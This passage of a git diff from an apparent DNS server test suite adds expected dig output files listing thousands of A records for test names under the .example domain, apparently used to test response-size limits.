10.0.1.157 +1000.example. 5M IN A 10.0.1.158 +1000.example. 5M IN A 10.0.1.159 +1000.example. 5M IN A 10.0.1.160 +1000.example. 5M IN A 10.0.1.161 +1000.example. 5M IN A 10.0.1.162 +1000.example. 5M IN A 10.0.1.163 +1000.example. 5M IN A 10.0.1.164 +1000.example. 5M IN A 10.0.1.165 +1000.example. 5M IN A 10.0.1.166 +1000.example. 5M IN A 10.0.1.167 +1000.example. 5M IN A 10.0.1.168 +1000.example. 5M IN A 10.0.1.169 +1000.example. 5M IN A 10.0.1.170 +1000.example. 5M IN A 10.0.1.171 +1000.example. 5M IN A 10.0.1.172 +1000.example. 5M IN A 10.0.1.173 +1000.example. 5M IN A 10.0.1.174 +1000.example. 5M IN A 10.0.1.175 +1000.example. 5M IN A 10.0.1.176 +1000.example. 5M IN A 10.0.1.177 +1000.example. 5M IN A 10.0.1.178 +1000.example. 5M IN A 10.0.1.179 +1000.example. 5M IN A 10.0.1.180 +1000.example. 5M IN A 10.0.1.181 +1000.example. 5M IN A 10.0.1.182 +1000.example. 5M IN A 10.0.1.183 +1000.example. 5M IN A 10.0.1.184 +1000.example. 5M IN A 10.0.1.185 +1000.example. 5M IN A 10.0.1.186 +1000.example. 5M IN A 10.0.1.187 +1000.example. 5M IN A 10.0.1.188 +1000.example. 5M IN A 10.0.1.189 +1000.example. 5M IN A 10.0.1.190 +1000.example. 5M IN A 10.0.1.191 +1000.example. 5M IN A 10.0.1.192 +1000.example. 5M IN A 10.0.1.193 +1000.example. 5M IN A 10.0.1.194 +1000.example. 5M IN A 10.0.1.195 +1000.example. 5M IN A 10.0.1.196 +1000.example. 5M IN A 10.0.1.197 +1000.example. 5M IN A 10.0.1.198 +1000.example. 5M IN A 10.0.1.199 +1000.example. 5M IN A 10.0.1.200 +1000.example. 5M IN A 10.0.1.201 +1000.example. 5M IN A 10.0.1.202 +1000.example. 5M IN A 10.0.1.203 +1000.example. 5M IN A 10.0.1.204 +1000.example. 5M IN A 10.0.1.205 +1000.example. 5M IN A 10.0.1.206 +1000.example. 5M IN A 10.0.1.207 +1000.example. 5M IN A 10.0.1.208 +1000.example. 5M IN A 10.0.1.209 +1000.example. 5M IN A 10.0.1.210 +1000.example. 5M IN A 10.0.1.211 +1000.example. 5M IN A 10.0.1.212 +1000.example. 5M IN A 10.0.1.213 +1000.example. 5M IN A 10.0.1.214 +1000.example. 5M IN A 10.0.1.215 +1000.example. 5M IN A 10.0.1.216 +1000.example. 5M IN A 10.0.1.217 +1000.example. 5M IN A 10.0.1.218 +1000.example. 5M IN A 10.0.1.219 +1000.example. 5M IN A 10.0.1.220 +1000.example. 5M IN A 10.0.1.221 +1000.example. 5M IN A 10.0.1.222 +1000.example. 5M IN A 10.0.1.223 +1000.example. 5M IN A 10.0.1.224 +1000.example. 5M IN A 10.0.1.225 +1000.example. 5M IN A 10.0.1.226 +1000.example. 5M IN A 10.0.1.227 +1000.example. 5M IN A 10.0.1.228 +1000.example. 5M IN A 10.0.1.229 +1000.example. 5M IN A 10.0.1.230 +1000.example. 5M IN A 10.0.1.231 +1000.example. 5M IN A 10.0.1.232 +1000.example. 5M IN A 10.0.1.233 +1000.example. 5M IN A 10.0.1.234 +1000.example. 5M IN A 10.0.1.235 +1000.example. 5M IN A 10.0.1.236 +1000.example. 5M IN A 10.0.1.237 +1000.example. 5M IN A 10.0.1.238 +1000.example. 5M IN A 10.0.1.239 +1000.example. 5M IN A 10.0.1.240 +1000.example. 5M IN A 10.0.1.241 +1000.example. 5M IN A 10.0.1.242 +1000.example. 5M IN A 10.0.1.243 +1000.example. 5M IN A 10.0.1.244 +1000.example. 5M IN A 10.0.1.245 +1000.example. 5M IN A 10.0.1.246 +1000.example. 5M IN A 10.0.1.247 +1000.example. 5M IN A 10.0.1.248 +1000.example. 5M IN A 10.0.1.249 +1000.example. 5M IN A 10.0.1.250 +1000.example. 5M IN A 10.0.1.251 +1000.example. 5M IN A 10.0.1.252 +1000.example. 5M IN A 10.0.1.253 +1000.example. 5M IN A 10.0.1.254 +1000.example. 5M IN A 10.0.1.255 +1000.example. 5M IN A 10.0.2.0 +1000.example. 5M IN A 10.0.2.1 +1000.example. 5M IN A 10.0.2.2 +1000.example. 5M IN A 10.0.2.3 +1000.example. 5M IN A 10.0.2.4 +1000.example. 5M IN A 10.0.2.5 +1000.example. 5M IN A 10.0.2.6 +1000.example. 5M IN A 10.0.2.7 +1000.example. 5M IN A 10.0.2.8 +1000.example. 5M IN A 10.0.2.9 +1000.example. 5M IN A 10.0.2.10 +1000.example. 5M IN A 10.0.2.11 +1000.example. 5M IN A 10.0.2.12 +1000.example. 5M IN A 10.0.2.13 +1000.example. 5M IN A 10.0.2.14 +1000.example. 5M IN A 10.0.2.15 +1000.example. 5M IN A 10.0.2.16 +1000.example. 5M IN A 10.0.2.17 +1000.example. 5M IN A 10.0.2.18 +1000.example. 5M IN A 10.0.2.19 +1000.example. 5M IN A 10.0.2.20 +1000.example. 5M IN A 10.0.2.21 +1000.example. 5M IN A 10.0.2.22 +1000.example. 5M IN A 10.0.2.23 +1000.example. 5M IN A 10.0.2.24 +1000.example. 5M IN A 10.0.2.25 +1000.example. 5M IN A 10.0.2.26 +1000.example. 5M IN A 10.0.2.27 +1000.example. 5M IN A 10.0.2.28 +1000.example. 5M IN A 10.0.2.29 +1000.example. 5M IN A 10.0.2.30 +1000.example. 5M IN A 10.0.2.31 +1000.example. 5M IN A 10.0.2.32 +1000.example. 5M IN A 10.0.2.33 +1000.example. 5M IN A 10.0.2.34 +1000.example. 5M IN A 10.0.2.35 +1000.example. 5M IN A 10.0.2.36 +1000.example. 5M IN A 10.0.2.37 +1000.example. 5M IN A 10.0.2.38 +1000.example. 5M IN A 10.0.2.39 +1000.example. 5M IN A 10.0.2.40 +1000.example. 5M IN A 10.0.2.41 +1000.example. 5M IN A 10.0.2.42 +1000.example. 5M IN A 10.0.2.43 +1000.example. 5M IN A 10.0.2.44 +1000.example. 5M IN A 10.0.2.45 +1000.example. 5M IN A 10.0.2.46 +1000.example. 5M IN A 10.0.2.47 +1000.example. 5M IN A 10.0.2.48 +1000.example. 5M IN A 10.0.2.49 +1000.example. 5M IN A 10.0.2.50 +1000.example. 5M IN A 10.0.2.51 +1000.example. 5M IN A 10.0.2.52 +1000.example. 5M IN A 10.0.2.53 +1000.example. 5M IN A 10.0.2.54 +1000.example. 5M IN A 10.0.2.55 +1000.example. 5M IN A 10.0.2.56 +1000.example. 5M IN A 10.0.2.57 +1000.example. 5M IN A 10.0.2.58 +1000.example. 5M IN A 10.0.2.59 +1000.example. 5M IN A 10.0.2.60 +1000.example. 5M IN A 10.0.2.61 +1000.example. 5M IN A 10.0.2.62 +1000.example. 5M IN A 10.0.2.63 +1000.example. 5M IN A 10.0.2.64 +1000.example. 5M IN A 10.0.2.65 +1000.example. 5M IN A 10.0.2.66 +1000.example. 5M IN A 10.0.2.67 +1000.example. 5M IN A 10.0.2.68 +1000.example. 5M IN A 10.0.2.69 +1000.example. 5M IN A 10.0.2.70 +1000.example. 5M IN A 10.0.2.71 +1000.example. 5M IN A 10.0.2.72 +1000.example. 5M IN A 10.0.2.73 +1000.example. 5M IN A 10.0.2.74 +1000.example. 5M IN A 10.0.2.75 +1000.example. 5M IN A 10.0.2.76 +1000.example. 5M IN A 10.0.2.77 +1000.example. 5M IN A 10.0.2.78 +1000.example. 5M IN A 10.0.2.79 +1000.example. 5M IN A 10.0.2.80 +1000.example. 5M IN A 10.0.2.81 +1000.example. 5M IN A 10.0.2.82 +1000.example. 5M IN A 10.0.2.83 +1000.example. 5M IN A 10.0.2.84 +1000.example. 5M IN A 10.0.2.85 +1000.example. 5M IN A 10.0.2.86 +1000.example. 5M IN A 10.0.2.87 +1000.example. 5M IN A 10.0.2.88 +1000.example. 5M IN A 10.0.2.89 +1000.example. 5M IN A 10.0.2.90 +1000.example. 5M IN A 10.0.2.91 +1000.example. 5M IN A 10.0.2.92 +1000.example. 5M IN A 10.0.2.93 +1000.example. 5M IN A 10.0.2.94 +1000.example. 5M IN A 10.0.2.95 +1000.example. 5M IN A 10.0.2.96 +1000.example. 5M IN A 10.0.2.97 +1000.example. 5M IN A 10.0.2.98 +1000.example. 5M IN A 10.0.2.99 +1000.example. 5M IN A 10.0.2.100 +1000.example. 5M IN A 10.0.2.101 +1000.example. 5M IN A 10.0.2.102 +1000.example. 5M IN A 10.0.2.103 +1000.example. 5M IN A 10.0.2.104 +1000.example. 5M IN A 10.0.2.105 +1000.example. 5M IN A 10.0.2.106 +1000.example. 5M IN A 10.0.2.107 +1000.example. 5M IN A 10.0.2.108 +1000.example. 5M IN A 10.0.2.109 +1000.example. 5M IN A 10.0.2.110 +1000.example. 5M IN A 10.0.2.111 +1000.example. 5M IN A 10.0.2.112 +1000.example. 5M IN A 10.0.2.113 +1000.example. 5M IN A 10.0.2.114 +1000.example. 5M IN A 10.0.2.115 +1000.example. 5M IN A 10.0.2.116 +1000.example. 5M IN A 10.0.2.117 +1000.example. 5M IN A 10.0.2.118 +1000.example. 5M IN A 10.0.2.119 +1000.example. 5M IN A 10.0.2.120 +1000.example. 5M IN A 10.0.2.121 +1000.example. 5M IN A 10.0.2.122 +1000.example. 5M IN A 10.0.2.123 +1000.example. 5M IN A 10.0.2.124 +1000.example. 5M IN A 10.0.2.125 +1000.example. 5M IN A 10.0.2.126 +1000.example. 5M IN A 10.0.2.127 +1000.example. 5M IN A 10.0.2.128 +1000.example. 5M IN A 10.0.2.129 +1000.example. 5M IN A 10.0.2.130 +1000.example. 5M IN A 10.0.2.131 +1000.example. 5M IN A 10.0.2.132 +1000.example. 5M IN A 10.0.2.133 +1000.example. 5M IN A 10.0.2.134 +1000.example. 5M IN A 10.0.2.135 +1000.example. 5M IN A 10.0.2.136 +1000.example. 5M IN A 10.0.2.137 +1000.example. 5M IN A 10.0.2.138 +1000.example. 5M IN A 10.0.2.139 +1000.example. 5M IN A 10.0.2.140 +1000.example. 5M IN A 10.0.2.141 +1000.example. 5M IN A 10.0.2.142 +1000.example. 5M IN A 10.0.2.143 +1000.example. 5M IN A 10.0.2.144 +1000.example. 5M IN A 10.0.2.145 +1000.example. 5M IN A 10.0.2.146 +1000.example. 5M IN A 10.0.2.147 +1000.example. 5M IN A 10.0.2.148 +1000.example. 5M IN A 10.0.2.149 +1000.example. 5M IN A 10.0.2.150 +1000.example. 5M IN A 10.0.2.151 +1000.example. 5M IN A 10.0.2.152 +1000.example. 5M IN A 10.0.2.153 +1000.example. 5M IN A 10.0.2.154 +1000.example. 5M IN A 10.0.2.155 +1000.example. 5M IN A 10.0.2.156 +1000.example. 5M IN A 10.0.2.157 +1000.example. 5M IN A 10.0.2.158 +1000.example. 5M IN A 10.0.2.159 +1000.example. 5M IN A 10.0.2.160 +1000.example. 5M IN A 10.0.2.161 +1000.example. 5M IN A 10.0.2.162 +1000.example. 5M IN A 10.0.2.163 +1000.example. 5M IN A 10.0.2.164 +1000.example. 5M IN A 10.0.2.165 +1000.example. 5M IN A 10.0.2.166 +1000.example. 5M IN A 10.0.2.167 +1000.example. 5M IN A 10.0.2.168 +1000.example. 5M IN A 10.0.2.169 +1000.example. 5M IN A 10.0.2.170 +1000.example. 5M IN A 10.0.2.171 +1000.example. 5M IN A 10.0.2.172 +1000.example. 5M IN A 10.0.2.173 +1000.example. 5M IN A 10.0.2.174 +1000.example. 5M IN A 10.0.2.175 +1000.example. 5M IN A 10.0.2.176 +1000.example. 5M IN A 10.0.2.177 +1000.example. 5M IN A 10.0.2.178 +1000.example. 5M IN A 10.0.2.179 +1000.example. 5M IN A 10.0.2.180 +1000.example. 5M IN A 10.0.2.181 +1000.example. 5M IN A 10.0.2.182 +1000.example. 5M IN A 10.0.2.183 +1000.example. 5M IN A 10.0.2.184 +1000.example. 5M IN A 10.0.2.185 +1000.example. 5M IN A 10.0.2.186 +1000.example. 5M IN A 10.0.2.187 +1000.example. 5M IN A 10.0.2.188 +1000.example. 5M IN A 10.0.2.189 +1000.example. 5M IN A 10.0.2.190 +1000.example. 5M IN A 10.0.2.191 +1000.example. 5M IN A 10.0.2.192 +1000.example. 5M IN A 10.0.2.193 +1000.example. 5M IN A 10.0.2.194 +1000.example. 5M IN A 10.0.2.195 +1000.example. 5M IN A 10.0.2.196 +1000.example. 5M IN A 10.0.2.197 +1000.example. 5M IN A 10.0.2.198 +1000.example. 5M IN A 10.0.2.199 +1000.example. 5M IN A 10.0.2.200 +1000.example. 5M IN A 10.0.2.201 +1000.example. 5M IN A 10.0.2.202 +1000.example. 5M IN A 10.0.2.203 +1000.example. 5M IN A 10.0.2.204 +1000.example. 5M IN A 10.0.2.205 +1000.example. 5M IN A 10.0.2.206 +1000.example. 5M IN A 10.0.2.207 +1000.example. 5M IN A 10.0.2.208 +1000.example. 5M IN A 10.0.2.209 +1000.example. 5M IN A 10.0.2.210 +1000.example. 5M IN A 10.0.2.211 +1000.example. 5M IN A 10.0.2.212 +1000.example. 5M IN A 10.0.2.213 +1000.example. 5M IN A 10.0.2.214 +1000.example. 5M IN A 10.0.2.215 +1000.example. 5M IN A 10.0.2.216 +1000.example. 5M IN A 10.0.2.217 +1000.example. 5M IN A 10.0.2.218 +1000.example. 5M IN A 10.0.2.219 +1000.example. 5M IN A 10.0.2.220 +1000.example. 5M IN A 10.0.2.221 +1000.example. 5M IN A 10.0.2.222 +1000.example. 5M IN A 10.0.2.223 +1000.example. 5M IN A 10.0.2.224 +1000.example. 5M IN A 10.0.2.225 +1000.example. 5M IN A 10.0.2.226 +1000.example. 5M IN A 10.0.2.227 +1000.example. 5M IN A 10.0.2.228 +1000.example. 5M IN A 10.0.2.229 +1000.example. 5M IN A 10.0.2.230 +1000.example. 5M IN A 10.0.2.231 +1000.example. 5M IN A 10.0.2.232 +1000.example. 5M IN A 10.0.2.233 +1000.example. 5M IN A 10.0.2.234 +1000.example. 5M IN A 10.0.2.235 +1000.example. 5M IN A 10.0.2.236 +1000.example. 5M IN A 10.0.2.237 +1000.example. 5M IN A 10.0.2.238 +1000.example. 5M IN A 10.0.2.239 +1000.example. 5M IN A 10.0.2.240 +1000.example. 5M IN A 10.0.2.241 +1000.example. 5M IN A 10.0.2.242 +1000.example. 5M IN A 10.0.2.243 +1000.example. 5M IN A 10.0.2.244 +1000.example. 5M IN A 10.0.2.245 +1000.example. 5M IN A 10.0.2.246 +1000.example. 5M IN A 10.0.2.247 +1000.example. 5M IN A 10.0.2.248 +1000.example. 5M IN A 10.0.2.249 +1000.example. 5M IN A 10.0.2.250 +1000.example. 5M IN A 10.0.2.251 +1000.example. 5M IN A 10.0.2.252 +1000.example. 5M IN A 10.0.2.253 +1000.example. 5M IN A 10.0.2.254 +1000.example. 5M IN A 10.0.2.255 +1000.example. 5M IN A 10.0.3.0 +1000.example. 5M IN A 10.0.3.1 +1000.example. 5M IN A 10.0.3.2 +1000.example. 5M IN A 10.0.3.3 +1000.example. 5M IN A 10.0.3.4 +1000.example. 5M IN A 10.0.3.5 +1000.example. 5M IN A 10.0.3.6 +1000.example. 5M IN A 10.0.3.7 +1000.example. 5M IN A 10.0.3.8 +1000.example. 5M IN A 10.0.3.9 +1000.example. 5M IN A 10.0.3.10 +1000.example. 5M IN A 10.0.3.11 +1000.example. 5M IN A 10.0.3.12 +1000.example. 5M IN A 10.0.3.13 +1000.example. 5M IN A 10.0.3.14 +1000.example. 5M IN A 10.0.3.15 +1000.example. 5M IN A 10.0.3.16 +1000.example. 5M IN A 10.0.3.17 +1000.example. 5M IN A 10.0.3.18 +1000.example. 5M IN A 10.0.3.19 +1000.example. 5M IN A 10.0.3.20 +1000.example. 5M IN A 10.0.3.21 +1000.example. 5M IN A 10.0.3.22 +1000.example. 5M IN A 10.0.3.23 +1000.example. 5M IN A 10.0.3.24 +1000.example. 5M IN A 10.0.3.25 +1000.example. 5M IN A 10.0.3.26 +1000.example. 5M IN A 10.0.3.27 +1000.example. 5M IN A 10.0.3.28 +1000.example. 5M IN A 10.0.3.29 +1000.example. 5M IN A 10.0.3.30 +1000.example. 5M IN A 10.0.3.31 +1000.example. 5M IN A 10.0.3.32 +1000.example. 5M IN A 10.0.3.33 +1000.example. 5M IN A 10.0.3.34 +1000.example. 5M IN A 10.0.3.35 +1000.example. 5M IN A 10.0.3.36 +1000.example. 5M IN A 10.0.3.37 +1000.example. 5M IN A 10.0.3.38 +1000.example. 5M IN A 10.0.3.39 +1000.example. 5M IN A 10.0.3.40 +1000.example. 5M IN A 10.0.3.41 +1000.example. 5M IN A 10.0.3.42 +1000.example. 5M IN A 10.0.3.43 +1000.example. 5M IN A 10.0.3.44 +1000.example. 5M IN A 10.0.3.45 +1000.example. 5M IN A 10.0.3.46 +1000.example. 5M IN A 10.0.3.47 +1000.example. 5M IN A 10.0.3.48 +1000.example. 5M IN A 10.0.3.49 +1000.example. 5M IN A 10.0.3.50 +1000.example. 5M IN A 10.0.3.51 +1000.example. 5M IN A 10.0.3.52 +1000.example. 5M IN A 10.0.3.53 +1000.example. 5M IN A 10.0.3.54 +1000.example. 5M IN A 10.0.3.55 +1000.example. 5M IN A 10.0.3.56 +1000.example. 5M IN A 10.0.3.57 +1000.example. 5M IN A 10.0.3.58 +1000.example. 5M IN A 10.0.3.59 +1000.example. 5M IN A 10.0.3.60 +1000.example. 5M IN A 10.0.3.61 +1000.example. 5M IN A 10.0.3.62 +1000.example. 5M IN A 10.0.3.63 +1000.example. 5M IN A 10.0.3.64 +1000.example. 5M IN A 10.0.3.65 +1000.example. 5M IN A 10.0.3.66 +1000.example. 5M IN A 10.0.3.67 +1000.example. 5M IN A 10.0.3.68 +1000.example. 5M IN A 10.0.3.69 +1000.example. 5M IN A 10.0.3.70 +1000.example. 5M IN A 10.0.3.71 +1000.example. 5M IN A 10.0.3.72 +1000.example. 5M IN A 10.0.3.73 +1000.example. 5M IN A 10.0.3.74 +1000.example. 5M IN A 10.0.3.75 +1000.example. 5M IN A 10.0.3.76 +1000.example. 5M IN A 10.0.3.77 +1000.example. 5M IN A 10.0.3.78 +1000.example. 5M IN A 10.0.3.79 +1000.example. 5M IN A 10.0.3.80 +1000.example. 5M IN A 10.0.3.81 +1000.example. 5M IN A 10.0.3.82 +1000.example. 5M IN A 10.0.3.83 +1000.example. 5M IN A 10.0.3.84 +1000.example. 5M IN A 10.0.3.85 +1000.example. 5M IN A 10.0.3.86 +1000.example. 5M IN A 10.0.3.87 +1000.example. 5M IN A 10.0.3.88 +1000.example. 5M IN A 10.0.3.89 +1000.example. 5M IN A 10.0.3.90 +1000.example. 5M IN A 10.0.3.91 +1000.example. 5M IN A 10.0.3.92 +1000.example. 5M IN A 10.0.3.93 +1000.example. 5M IN A 10.0.3.94 +1000.example. 5M IN A 10.0.3.95 +1000.example. 5M IN A 10.0.3.96 +1000.example. 5M IN A 10.0.3.97 +1000.example. 5M IN A 10.0.3.98 +1000.example. 5M IN A 10.0.3.99 +1000.example. 5M IN A 10.0.3.100 +1000.example. 5M IN A 10.0.3.101 +1000.example. 5M IN A 10.0.3.102 +1000.example. 5M IN A 10.0.3.103 +1000.example. 5M IN A 10.0.3.104 +1000.example. 5M IN A 10.0.3.105 +1000.example. 5M IN A 10.0.3.106 +1000.example. 5M IN A 10.0.3.107 +1000.example. 5M IN A 10.0.3.108 +1000.example. 5M IN A 10.0.3.109 +1000.example. 5M IN A 10.0.3.110 +1000.example. 5M IN A 10.0.3.111 +1000.example. 5M IN A 10.0.3.112 +1000.example. 5M IN A 10.0.3.113 +1000.example. 5M IN A 10.0.3.114 +1000.example. 5M IN A 10.0.3.115 +1000.example. 5M IN A 10.0.3.116 +1000.example. 5M IN A 10.0.3.117 +1000.example. 5M IN A 10.0.3.118 +1000.example. 5M IN A 10.0.3.119 +1000.example. 5M IN A 10.0.3.120 +1000.example. 5M IN A 10.0.3.121 +1000.example. 5M IN A 10.0.3.122 +1000.example. 5M IN A 10.0.3.123 +1000.example. 5M IN A 10.0.3.124 +1000.example. 5M IN A 10.0.3.125 +1000.example. 5M IN A 10.0.3.126 +1000.example. 5M IN A 10.0.3.127 +1000.example. 5M IN A 10.0.3.128 +1000.example. 5M IN A 10.0.3.129 +1000.example. 5M IN A 10.0.3.130 +1000.example. 5M IN A 10.0.3.131 +1000.example. 5M IN A 10.0.3.132 +1000.example. 5M IN A 10.0.3.133 +1000.example. 5M IN A 10.0.3.134 +1000.example. 5M IN A 10.0.3.135 +1000.example. 5M IN A 10.0.3.136 +1000.example. 5M IN A 10.0.3.137 +1000.example. 5M IN A 10.0.3.138 +1000.example. 5M IN A 10.0.3.139 +1000.example. 5M IN A 10.0.3.140 +1000.example. 5M IN A 10.0.3.141 +1000.example. 5M IN A 10.0.3.142 +1000.example. 5M IN A 10.0.3.143 +1000.example. 5M IN A 10.0.3.144 +1000.example. 5M IN A 10.0.3.145 +1000.example. 5M IN A 10.0.3.146 +1000.example. 5M IN A 10.0.3.147 +1000.example. 5M IN A 10.0.3.148 +1000.example. 5M IN A 10.0.3.149 +1000.example. 5M IN A 10.0.3.150 +1000.example. 5M IN A 10.0.3.151 +1000.example. 5M IN A 10.0.3.152 +1000.example. 5M IN A 10.0.3.153 +1000.example. 5M IN A 10.0.3.154 +1000.example. 5M IN A 10.0.3.155 +1000.example. 5M IN A 10.0.3.156 +1000.example. 5M IN A 10.0.3.157 +1000.example. 5M IN A 10.0.3.158 +1000.example. 5M IN A 10.0.3.159 +1000.example. 5M IN A 10.0.3.160 +1000.example. 5M IN A 10.0.3.161 +1000.example. 5M IN A 10.0.3.162 +1000.example. 5M IN A 10.0.3.163 +1000.example. 5M IN A 10.0.3.164 +1000.example. 5M IN A 10.0.3.165 +1000.example. 5M IN A 10.0.3.166 +1000.example. 5M IN A 10.0.3.167 +1000.example. 5M IN A 10.0.3.168 +1000.example. 5M IN A 10.0.3.169 +1000.example. 5M IN A 10.0.3.170 +1000.example. 5M IN A 10.0.3.171 +1000.example. 5M IN A 10.0.3.172 +1000.example. 5M IN A 10.0.3.173 +1000.example. 5M IN A 10.0.3.174 +1000.example. 5M IN A 10.0.3.175 +1000.example. 5M IN A 10.0.3.176 +1000.example. 5M IN A 10.0.3.177 +1000.example. 5M IN A 10.0.3.178 +1000.example. 5M IN A 10.0.3.179 +1000.example. 5M IN A 10.0.3.180 +1000.example. 5M IN A 10.0.3.181 +1000.example. 5M IN A 10.0.3.182 +1000.example. 5M IN A 10.0.3.183 +1000.example. 5M IN A 10.0.3.184 +1000.example. 5M IN A 10.0.3.185 +1000.example. 5M IN A 10.0.3.186 +1000.example. 5M IN A 10.0.3.187 +1000.example. 5M IN A 10.0.3.188 +1000.example. 5M IN A 10.0.3.189 +1000.example. 5M IN A 10.0.3.190 +1000.example. 5M IN A 10.0.3.191 +1000.example. 5M IN A 10.0.3.192 +1000.example. 5M IN A 10.0.3.193 +1000.example. 5M IN A 10.0.3.194 +1000.example. 5M IN A 10.0.3.195 +1000.example. 5M IN A 10.0.3.196 +1000.example. 5M IN A 10.0.3.197 +1000.example. 5M IN A 10.0.3.198 +1000.example. 5M IN A 10.0.3.199 +1000.example. 5M IN A 10.0.3.200 +1000.example. 5M IN A 10.0.3.201 +1000.example. 5M IN A 10.0.3.202 +1000.example. 5M IN A 10.0.3.203 +1000.example. 5M IN A 10.0.3.204 +1000.example. 5M IN A 10.0.3.205 +1000.example. 5M IN A 10.0.3.206 +1000.example. 5M IN A 10.0.3.207 +1000.example. 5M IN A 10.0.3.208 +1000.example. 5M IN A 10.0.3.209 +1000.example. 5M IN A 10.0.3.210 +1000.example. 5M IN A 10.0.3.211 +1000.example. 5M IN A 10.0.3.212 +1000.example. 5M IN A 10.0.3.213 +1000.example. 5M IN A 10.0.3.214 +1000.example. 5M IN A 10.0.3.215 +1000.example. 5M IN A 10.0.3.216 +1000.example. 5M IN A 10.0.3.217 +1000.example. 5M IN A 10.0.3.218 +1000.example. 5M IN A 10.0.3.219 +1000.example. 5M IN A 10.0.3.220 +1000.example. 5M IN A 10.0.3.221 +1000.example. 5M IN A 10.0.3.222 +1000.example. 5M IN A 10.0.3.223 +1000.example. 5M IN A 10.0.3.224 +1000.example. 5M IN A 10.0.3.225 +1000.example. 5M IN A 10.0.3.226 +1000.example. 5M IN A 10.0.3.227 +1000.example. 5M IN A 10.0.3.228 +1000.example. 5M IN A 10.0.3.229 +1000.example. 5M IN A 10.0.3.230 +1000.example. 5M IN A 10.0.3.231 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 69 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:14 2000 +;; MSG SIZE sent: 30 rcvd: 16064 + diff --git a/bin/tests/system/limits/knowngood.dig.out.2000 b/bin/tests/system/limits/knowngood.dig.out.2000 new file mode 100644 index 0000000..96c9181 --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.2000 @@ -0,0 +1,2023 @@ + +; <<>> DiG 8.2 <<>> 2000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 2000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 2000.example, type = A, class = IN + +;; ANSWER SECTION: +2000.example. 5M IN A 10.0.0.0 +2000.example. 5M IN A 10.0.0.1 +2000.example. 5M IN A 10.0.0.2 +2000.example. 5M IN A 10.0.0.3 +2000.example. 5M IN A 10.0.0.4 +2000.example. 5M IN A 10.0.0.5 +2000.example. 5M IN A 10.0.0.6 +2000.example. 5M IN A 10.0.0.7 +2000.example. 5M IN A 10.0.0.8 +2000.example. 5M IN A 10.0.0.9 +2000.example. 5M IN A 10.0.0.10 +2000.example. 5M IN A 10.0.0.11 +2000.example. 5M IN A 10.0.0.12 +2000.example. 5M IN A 10.0.0.13 +2000.example. 5M IN A 10.0.0.14 +2000.example. 5M IN A 10.0.0.15 +2000.example. 5M IN A 10.0.0.16 +2000.example. 5M IN A 10.0.0.17 +2000.example. 5M IN A 10.0.0.18 +2000.example. 5M IN A 10.0.0.19 +2000.example. 5M IN A 10.0.0.20 +2000.example. 5M IN A 10.0.0.21 +2000.example. 5M IN A 10.0.0.22 +2000.example. 5M IN A 10.0.0.23 +2000.example. 5M IN A 10.0.0.24 +2000.example. 5M IN A 10.0.0.25 +2000.example. 5M IN A 10.0.0.26 +2000.example. 5M IN A 10.0.0.27 +2000.example. 5M IN A 10.0.0.28 +2000.example. 5M IN A 10.0.0.29 +2000.example. 5M IN A 10.0.0.30 +2000.example. 5M IN A 10.0.0.31 +2000.example. 5M IN A 10.0.0.32 +2000.example. 5M IN A 10.0.0.33 +2000.example. 5M IN A 10.0.0.34 +2000.example. 5M IN A 10.0.0.35 +2000.example. 5M IN A 10.0.0.36 +2000.example. 5M IN A 10.0.0.37 +2000.example. 5M IN A 10.0.0.38 +2000.example. 5M IN A 10.0.0.39 +2000.example. 5M IN A 10.0.0.40 +2000.example. 5M IN A 10.0.0.41 +2000.example. 5M IN A 10.0.0.42 +2000.example. 5M IN A 10.0.0.43 +2000.example. 5M IN A 10.0.0.44 +2000.example. 5M IN A 10.0.0.45 +2000.example. 5M IN A 10.0.0.46 +2000.example. 5M IN A 10.0.0.47 +2000.example. 5M IN A 10.0.0.48 +2000.example. 5M IN A 10.0.0.49 +2000.example. 5M IN A 10.0.0.50 +2000.example. 5M IN A 10.0.0.51 +2000.example. 5M IN A 10.0.0.52 +2000.example. 5M IN A 10.0.0.53 +2000.example. 5M IN A 10.0.0.54 +2000.example. 5M IN A 10.0.0.55 +2000.example. 5M IN A 10.0.0.56 +2000.example. 5M IN A 10.0.0.57 +2000.example. 5M IN A 10.0.0.58 +2000.example. 5M IN A 10.0.0.59 +2000.example. 5M IN A 10.0.0.60 +2000.example. 5M IN A 10.0.0.61 +2000.example. 5M IN A 10.0.0.62 +2000.example. 5M IN A 10.0.0.63 +2000.example. 5M IN A 10.0.0.64 +2000.example. 5M IN A 10.0.0.65 +2000.example. 5M IN A 10.0.0.66 +2000.example. 5M IN A 10.0.0.67 +2000.example. 5M IN A 10.0.0.68 +2000.example. 5M IN A 10.0.0.69 +2000.example. 5M IN A 10.0.0.70 +2000.example. 5M IN A 10.0.0.71 +2000.example. 5M IN A 10.0.0.72 +2000.example. 5M IN A 10.0.0.73 +2000.example. 5M IN A 10.0.0.74 +2000.example. 5M IN A 10.0.0.75 +2000.example. 5M IN A 10.0.0.76 +2000.example. 5M IN A 10.0.0.77 +2000.example. 5M IN A 10.0.0.78 +2000.example. 5M IN A 10.0.0.79 +2000.example. 5M IN A 10.0.0.80 +2000.example. 5M IN A 10.0.0.81 +2000.example. 5M IN A 10.0.0.82 +2000.example. 5M IN A 10.0.0.83 +2000.example. 5M IN A 10.0.0.84 +2000.example. 5M IN A 10.0.0.85 +2000.example. 5M IN A 10.0.0.86 +2000.example. 5M IN A 10.0.0.87 +2000.example. 5M IN A 10.0.0.88 +2000.example. 5M IN A 10.0.0.89 +2000.example. 5M IN A 10.0.0.90 +2000.example. 5M IN A 10.0.0.91 +2000.example. 5M IN A 10.0.0.92 +2000.example. 5M IN A 10.0.0.93 +2000.example. 5M IN A 10.0.0.94 +2000.example. 5M IN A 10.0.0.95 +2000.example. 5M IN A 10.0.0.96 +2000.example. 5M IN A 10.0.0.97 +2000.example. 5M IN A 10.0.0.98 +2000.example. 5M IN A 10.0.0.99 +2000.example. 5M IN A 10.0.0.100 +2000.example. 5M IN A 10.0.0.101 +2000.example. 5M IN A 10.0.0.102 +2000.example. 5M IN A 10.0.0.103 +2000.example. 